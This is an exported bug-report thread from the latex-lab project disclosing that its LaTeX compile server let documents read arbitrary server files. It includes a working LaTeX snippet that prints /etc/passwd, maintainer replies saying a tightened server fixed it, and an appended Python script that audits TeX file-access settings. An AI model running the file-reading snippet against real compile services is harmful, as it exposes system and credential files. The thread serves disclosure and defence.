google-code-export / latex-lab

Automatically exported from code.google.com/p/latex-lab

Default CLSI provider allows reading of arbitrary files on server #141

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
What steps will reproduce the problem?
1. Create a document containing LaTeX code that reads and displays the contents of a remote file. For example:

    \documentclass{article}
    \begin{document}
    \openin5=/etc/passwd
    \def\readfile{%
        \read5 to\curline
        \ifeof5 \let\next=\relax
        \else   \curline~\\
                \let\next=\readfile
        \fi
        \next}%
    \ifeof5 Couldn't read the file!%
    \else   \readfile \closein5
    \fi
    \end{document}

2. Compile document

What is the expected output? What do you see instead?
I'd expect the document to fail to compile, due to sandboxing or a crippled compiler with file i/o disabled. Instead, I see the contents of /etc/passwd:

http://img.skitch.com/20100521-grpuaik7tmqp3b89c17pmuhg5s.png

Please provide any additional information below.
http://cseweb.ucsd.edu/~hovav/papers/csr10.html

Original issue reported on code.google.com by kevinwallace on 21 May 2010 at 4:27

GoogleCodeExporter commented 9 years ago
That's not supposed to happen, thanks for reporting. There's a newer, tighter CLSI server being deployed which should cover this hole.

Original comment by bobbysoa...@gmail.com on 21 May 2010 at 5:15

GoogleCodeExporter commented 9 years ago
There's a new CLSI environment in place which fixes this issue. Do try again. :)

Original comment by bobbysoa...@gmail.com on 21 May 2010 at 4:05
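
One way to check that a TeX installation would refuse the read shown in the report, added here as an example (not code from latex-lab or the CLSI server, whose actual fix the thread does not describe): it audits a `texmf.cnf` for Kpathsea's `openin_any` and `openout_any` file-access policies, where `a` is any, `r` is restricted and `p` is paranoid. The function names and sample configs are constructed, and the parser is simplified (no line continuations).

```python
import re

LINE = re.compile(r"^\s*(\w+)(?:\.(\w+))?\s*=?\s*(\S*)")
WATCHED = ("openin_any", "openout_any")  # Kpathsea policies for \openin / \openout

def effective_policy(cnf_text, program):
    """Return {variable: value or None} as `program` would see it."""
    seen = {}
    for raw in cnf_text.splitlines():
        line = re.sub(r"(^|\s)%.*", "", raw)  # % starts a comment
        m = LINE.match(line)
        if not m or m.group(1) not in WATCHED:
            continue
        name, prog, value = m.groups()
        # Earlier definitions override later ones, so keep only the first.
        seen.setdefault((name, prog), value)
    # A program-qualified entry (var.progname) wins over the unqualified one.
    return {v: seen.get((v, program), seen.get((v, None))) for v in WATCHED}

def audit(cnf_text, program="pdflatex"):
    """List findings for any watched policy that is not explicitly paranoid."""
    findings = []
    for var, value in effective_policy(cnf_text, program).items():
        if value is None:
            findings.append(f"{var}: not set, compiled-in default applies")
        elif not value.startswith("p"):
            findings.append(f"{var} = {value}: not paranoid (p)")
    return findings

# Constructed sample configs (not taken from the latex-lab or CLSI deployment).
PERMISSIVE = """\
% file access
openin_any = a
openout_any = p
"""
HARDENED = """\
openin_any.pdflatex = p   % per-program override
openin_any = a
openout_any = p
"""

if __name__ == "__main__":
    for label, cnf in (("permissive", PERMISSIVE), ("hardened", HARDENED)):
        print(label, audit(cnf) or "ok")
```

The hardened sample passes only for `pdflatex`; any other engine on the same host still falls back to the unqualified `openin_any = a`, so run the audit once per engine the service can invoke.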